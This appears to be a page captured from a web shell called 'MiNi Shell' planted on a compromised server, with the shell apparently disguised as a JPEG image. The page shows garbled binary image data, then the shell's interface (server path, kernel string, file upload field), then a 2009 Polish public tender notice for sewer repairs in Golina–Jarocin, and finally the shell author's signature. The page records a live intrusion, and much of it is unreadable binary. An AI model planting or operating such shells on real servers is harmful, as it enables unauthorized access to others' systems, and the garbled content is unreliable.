JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/60391-N-2009.html

<p class="kh_header"><b>Jarocin: Przebudowa sieci kanalizacji sanitarnej na trasie Golina - Jarocin</b><br>
<b>Numer ogłoszenia: 60391 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o. z siedzibą w Jarocinie , ul. Marcina Kasprzaka 1a, 63-200 Jarocin, woj. wielkopolskie, tel. 062 7473487, 7477318, faks 062 7473480.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwikjarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa sieci kanalizacji sanitarnej na trasie Golina - Jarocin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi:

Etap 1:
1.1. Remont przepompowni P-4 w Golinie - w technologii Hobas połączonej 
z MC-Bauchemie ( poprzez wstawienie w istniejące elementy betonowe rur 
z tworzyw sztucznych HOBAS i izolacji pokrywy przepompowni w techno-logii MC-Bauchemie).
1.2. Przebudowa 35 studni rewizyjnych w Golinie - poprzez  demontaż starych i montaż nowych wykonanych z PP zwieńczonych kręgami zwężkowymi dn 1,00/0,60m oraz włazami żeliwnymi typu D400 i kręgami odciążającymi.

Etap 2:
2.1. Naprawa przepompowni P-3 w Golinie - poprzez pokrycie elementów be-tonowych i stalowych (żeliwnych) powłokami mineralnymi w technologii MC-Bauchemie.
2.2. Remont przepompowni P-2 w Golinie - w technologii Hobas połączonej 
z MC-Bauchemie ( poprzez wstawienie w istniejące elementy betonowe rur 
z tworzyw sztucznych HOBAS i izolacji pokrywy przepompowni w techno-logii MC-Bauchemie).

Do każdej z nazw firm, znaków firmowych, itp., które zostały wymienione w niniejszej specyfikacji, projektach budowlano-wykonawczych (stanowiących załącznik do niniej-szej specyfikacji), specyfikacji technicznej wykonania i odbioru robót budowlanych (stanowiącej załącznik do niniejszej specyfikacji) oraz przedmiarach robót (stanowiących załącznik do niniejszej specyfikacji) - dodaje się słowa: lub równoważne.

Wykonawca jest zobowiązany po podpisaniu umowy do opracowania i przedstawienia harmonogramu realizacji prac, z podziałem na zakres rzeczowy, finansowy oraz z po-działem na terminy zakończenia poszczególnych elementów, przy czym nieprzekra-czalnym jest termin zakończenia etapu 1 do 30.06.2009 r., a całości prac do 31.12.2009 r. Po akceptacji Zamawiającego, w/w harmonogram będzie stanowił załącznik do umo-wy.

Przedmiot zamówienia musi zostać wykonany pod nadzorem firmy eksploatującej na te-renie gminy Jarocin sieci kanalizacyjne i przepompownie ścieków.

Szczegółowy zakres i sposób został wskazany w takich dokumentach jak: projekty bu-dowlano-wykonawcze (stanowiące załącznik do specyfikacji), specyfikacje techniczne wykonania i odbioru robót budowlanych (stanowiące załącznik do specyfikacji) oraz przedmiary robót (stanowiące załącznik do specyfikacji).
W ramach realizacji przedmiotu zamówienia, Wykonawca zobowiązany jest do:
- Ścisłej współpracy z Zamawiającym i Inspektorem Nadzoru
- Przygotowania na swój koszt terenu budowy, składowisk, magazynów, pomieszczeń socjalnych dla pracowników i zabezpieczenia terenu budowy w czasie jej trwania
- Pokrycia wszystkich kosztów i opłat koniecznych do wykonania przedmiotu umowy, a w szczególności za energię elektryczną, wodę, ogrzewania, usługi telekomunika-cyjne
- Ubezpieczenia budowy
- Prowadzenia dziennika budowy
- Przejęcia placu i terenu budowy
- Uczestniczenia w naradach zwołanych przez Zamawiającego
- Przedkładania sprawozdań rzeczowych - co tydzień lub wg potrzeb Zamawiającego
- Informowania Zamawiającego o problemach lub okolicznościach mogących wpłynąć na jakość robót lub opóźnienia terminu zakończenia wykonania niniejszej umowy
- Uzyskania uaktualnienia uzgodnień z użytkownikami sieci znajdujących się w pasie robót oraz uzyskania niezbędnych decyzji do prowadzenia robót
- W wypadku wystąpienia kolizji do współpracy z użytkownikami sieci w celu ich usunięcia
- Uporządkowania terenu budowy i przekazania go Zamawiającemu w terminie od-bioru robót
- Pełnej obsługi geodezyjnej zadania (w tym: wytyczenia repery robocze, inwentary-zacja powykonawcza)
- Organizacji i utrzymania zaplecza technicznego budowy oraz dozoru budowy
- Przywrócenia do stanu pierwotnego zniszczonych lub uszkodzonych składników majątkowych, znajdujących się na terenie budowy
- Pełnej obsługi dostaw materiałów, urządzeń itd. do wykonania przedmiotu zamó-wienia
- Opłat z tytułu zajęcia pasa drogowego i innych utrudnień w trakcie realizacji zada-nia; projektów tymczasowego oznakowania i organizacji ruchu kołowego, umiesz-czenia urządzeń obcych niezwiązanych z funkcjonowaniem drogi
- Odwodnienia terenu dla budowy kanalizacji
- Uzyskania decyzji na wejście w pas drogowy
- Odtworzenia elementów infrastruktury, w tym nawierzchni
- Ewentualnego uaktualnienia uzgodnień
- Stałego nadzoru archeologiczno - konserwatorskiego nad całością prac

Przedmiot zamówienia ma być wykonany w systemie zapewniania jakości opartym na normie DIN EN ISO 9001:2000. W celu potwierdzenia, że oferowane roboty budowlane odpowiadają powyższemu wymogowi, Zamawiający wymaga dołączenia do oferty zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z w/w normą jakościową..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 11.049,84 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
5.1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
5.2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują lub będą dyspono-wać potencjałem technicznym i osobami zdolnymi do wykonania zamówienia 
5.3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
5.4.	Przedstawią aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wyma-gają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
5.5.	Przedstawią aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolni-czego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdro-wotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwol-nienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
5.6.	Posiadają aktualną informację z Krajowego Rejestru Karnego w zakresie okre-ślonym w art. 24 ust. 1 pkt 4 - 8 ustawy Prawo zamówień publicznych , wysta-wioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
5.7.	Posiadają aktualną informację z Krajowego Rejestru Karnego w zakresie okre-ślonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
5.8.	Wykażą wykonane roboty budowlane w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i war-tością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów po-twierdzających, że roboty te zostały wykonane należycie. Za roboty odpowiada-jące rodzajem zamówienia, Zamawiający uznawał będzie wykonanie robót pole-gających na co najmniej:
- wybudowaniu - w ramach 3 zadań - rurociągów kanalizacji sanitarnej z rur PCV o przekroju nie mniejszym niż O 200 i długości nie mniejszej niż 1 km - w każdym z zadań
- wybudowaniu - w ramach 3 zadań - przynajmniej 3 przepompowni ścieków - w każdym z zadań
5.9.	Przedstawią wykaz narzędzi i urządzeń niezbędnych do wykonania zamówienia, którymi dysponuje lub będzie dysponował Wykonawca, przy czym najważniej-szym elementem będzie wykazanie, że Wykonawca dysponuje lub będzie dys-ponował co najmniej: 
- 3 koparko-ładowarki
- 3 koparki obrotowe
- 3 samochody ciężarowe o ładowności powyżej 10 ton
- 3 zagęszczarki o minimalnej sile odśrodkowej 40 kN
- zestaw igłofiltrów wraz z pompą
5.10.	Wskażą w ofercie część zamówienia, której wykonanie powierzą podwykonaw-com, przy czym łączna wartość prac wykonywanych przez podwykonawców nie może przekroczyć 30 % wynagrodzenia wykonawcy za cały przedmiot zamó-wienia
5.11.	Dysponują lub będą dysponować wykwalifikowaną kadrą techniczną w branży sanitarnej (przynajmniej 1 osoba), która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą obowiązujące w dniu otwarcia ofert zaświadczenia o wpisie do Okręgowej Izby Inżynierów Budownictwa oraz decyzje o nadaniu uprawnień budowlanych
5.12.	Przedstawią sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłe-go rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozdaniu, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, przy czym najważniejszym elementem będzie wykazanie obrotów, które nie mogą być mniejsze niż 5 mln zł
5.13.	Przedstawią informację banku lub spółdzielczej kasy oszczędnościowo - kredy-towej, w których wykonawca posiada rachunek, potwierdzającą wysokość po-siadanych własnych środków finansowych w wysokości nie mniejszej niż 1 mln zł lub zdolność kredytową w wysokości nie mniejszej niż 1 mln zł, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
5.14.	Przedstawią polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie pro-wadzonej działalności, z włączeniem odpowiedzialności za szkody powstałe po wykonaniu pracy lub usługi wynikłe z ich wadliwego wykonania, przy czym suma gwarancyjna nie może być mniejsza niż 1 mln zł
5.15.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (z postę-powania o udzielenie zamówienia wyklucza się wykonawców, o których mowa w art. 24 ust. 1-2, oraz tych, którzy nie spełniają warunków udziału w postępo-waniu, o których mowa w pkt 5.1. - 5.14)

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu
Zamawiający dokona oceny spełniania powyższych warunków na podstawie oświadczeń i dokumentów, o których mowa w ust. 6, zgodnie z formułą: spełnia - nie spełnia. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż w/w warunki wyko-nawca spełnia. Nie spełnienie chociażby jednego z warunków skutkować będzie wyklu-czeniem wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.1.	Oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, wg załączonego do specyfikacji wzoru
6.2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
6.3.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz wła-ściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie za-lega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, od-roczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesią-ce przed upływem terminu składania ofert
6.4.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 4 - 8 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6.5.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6.6.	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowa-dzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodza-jem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, 
z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem doku-mentów potwierdzających, że roboty te zostały wykonane należycie. Za roboty odpowiadające rodzajem zamówienia, Zamawiający uznawał będzie wykonanie robót polegających na co najmniej:
- wybudowaniu - w ramach 3 zadań - rurociągów kanalizacji sanitarnej z rur PCV o przekroju nie mniejszym niż O 200 i długości nie mniejszej niż 1 km - w każdym z zadań
- wybudowaniu - w ramach 3 zadań - przynajmniej 3 przepompowni ścieków - w każdym z zadań
6.7.	Wykaz narzędzi i urządzeń niezbędnych do wykonania zamówienia, którymi dysponuje lub będzie dysponował Wykonawca, przy czym najważniejszym ele-mentem będzie wykazanie, że Wykonawca dysponuje lub będzie dysponował co najmniej: 
- 3 koparko-ładowarki
- 3 koparki obrotowe
- 3 samochody ciężarowe o ładowności powyżej 10 ton
- 3 zagęszczarki o minimalnej sile odśrodkowej 40 kN
- zestaw igłofiltrów wraz z pompą
6.8.	Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wy-konania zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa 
w pkt 6.8., Wykonawca wskazał narzędzia i urządzenia, którymi będzie dyspo-nował
6.9.	Wykaz części zamówienia, której wykonanie zostanie powierzone podwyko-nawcom, przy czym łączna wartość prac wykonywanych przez podwykonawców nie może przekroczyć 30 % wynagrodzenia wykonawcy za cały przedmiot za-mówienia
6.10.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 6.10., Wyko-nawca wskazał osoby, którymi będzie dysponował
6.11.	Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które bę-dą uczestniczyć w wykonywaniu zamówienia, wg załączonego do specyfikacji wzoru
6.12.	Decyzja o nadaniu uprawnień budowlanych dla wszystkich osób wymienionych w załączniku Informacja o kadrze technicznej
6.13.	Obowiązujące w dniu otwarcia ofert zaświadczenie o wpisie do Okręgowej Izby Inżynierów Budownictwa dla wszystkich osób wymienionych w załączniku In-formacja o kadrze technicznej
6.14.	Sprawozdanie finansowe, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią o badanym sprawozda-niu, a w przypadku wykonawców niezobowiązanych do sporządzania sprawoz-dania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, przy czym najważniejszym elementem będzie wykazanie obrotów, które nie mogą być mniejsze niż 5 mln zł
6.15.	Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w któ-rych wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środ-ków finansowych w wysokości nie mniejszej niż 1 mln zł lub zdolność kredyto-wą w wysokości nie mniejszej niż 1 mln zł, wystawioną nie wcześniej niż 3 mie-siące przed upływem terminu składania ofert
6.16.	Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej dzia-łalności, z włączeniem odpowiedzialności za szkody powstałe po wykonaniu pracy lub usługi wynikłe z ich wadliwego wykonania, przy czym suma gwaran-cyjna nie może być mniejsza niż 1 mln zł
6.17.	Pełny kosztorys ofertowy (uproszczony lub szczegółowy), zawierający wszystkie pozycje z załączonych do specyfikacji przedmiarów
6.18.	Kserokopia dokumentu wadialnego. W przypadku wniesienia wadium w formie niepieniężnej oryginał należy złożyć w Kasie Zamawiającego
6.19.	Pełnomocnictwo wskazujące pełnomocnika wykonawców wspólnie ubiegających się o udzielenie zamówienia, z zastrzeżeniem, że pełnomocnictwo to musi być podpisane przez wszystkich zainteresowanych wykonawców - w przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia jako najkorzystniejszej, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych pod-miotów
6.20.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rze-czypospolitej Polskiej 
6.20.1.	zamiast dokumentów, o których mowa w pkt 5.4., 5.5., 5.7. pkt Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
6.20.1.1.	nie otwarto jego likwidacji ani nie ogłoszono upadłości
6.20.1.2.	nie zalega z uiszczaniem podatków, opłat, składek na ubez-pieczenie społeczne i zdrowotne albo że uzyskał przewi-dziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
6.20.1.3.	nie orzeczono wobec niego zakazu ubiegania się o zamó-wienie
6.20.2.	zamiast dokumentów, o których mowa w pkt 5.6. pkt Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny speł-niania tych warunków - składa zaświadczenie właściwego organu są-dowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie  określonym w art. 24 ust. 1 pkt 4-8 ustawy
6.20.3.	Dokumenty, o których mowa w pkt 6.20.1.1., 6.20.1.3. i 6.20.2. niniej-szej specyfikacji, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w 6.20.1.2., powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczone przez wykonawcę.
6.20.4.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, 
o których mowa w 6.20.1., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądo-wym, administracyjnym albo organem samorządu zawodowego lub go-spodarczego odpowiednio kraju pochodzenia osoby lub kraju, w któ-rym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy pkt 6.20.3. stosuje się odpowiednio.
6.21.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
6.21.1.	Do oferty należy załączyć pełnomocnictwo wskazujące pełnomocnika wykonawców wspólnie ubiegających się o udzielenie zamówienia, 
z zastrzeżeniem, że pełnomocnictwo to musi być podpisane przez wszystkich zainteresowanych wykonawców - jeśli dotyczy (w przy-padku wyboru oferty wykonawców wspólnie ubiegających się o udzie-lenie zamówienia jako najkorzystniejszej, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych podmiotów).
6.21.2.	Zamawiający wymagać będzie oddzielnie od każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumentów, 
o których mowa w punktach: 6.1., 6.2., 6.3., 6.4., 6.5., 6.17. pkt Wy-kaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu - nie podlegają one sumowaniu.
6.21.3.	Załączenie dokumentów, o których mowa powyżej, ma udowodnić, że żaden z uczestników nie podlega wykluczeniu z postępowania o udzie-lenie zamówienia.
6.21.4.	Jeśli przynajmniej jeden z uczestników nie przedstawi dokumentów albo z innego powodu podlega wykluczeniu, wykluczeni zostaną wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
6.21.5.	Oświadczenia i dokumenty niewymienione w pkt 6.21.2. niniejszej spe-cyfikacji wykonawcy składają wspólnie i podlegają one sumowaniu.
6.21.6.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie. 
6.21.7.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (li-dera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. 
6.21.8.	Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie 
z pełnomocnikiem (liderem). 
6.21.9.	Wypełniając formularz ofertowy, jak również inne dokumenty powołu-jące się na wykonawcę, w miejscu np.: nazwa i adres wykonawcy nale-ży wpisać dane dotyczące wykonawców wspólnie ubiegających się o udzielenie zamówienia, a nie tylko pełnomocnika; rozumie się przez to nazwę i adres pełnomocnika (lidera) oraz nazwę i adres partnerów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pwikjarocin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jest zamieszczona na stronie internetowej: www.pwikjarocin.pl. SIWZ w wersji papierowej płatna: 200,00 zł netto (sposób płatności: przelew)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2009 godzina 11:00, miejsce: Sekretariat (na I piętrze) w siedzibie Zamawiającego: ul. Kasprzaka 1a, 63-200 Jarocin.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com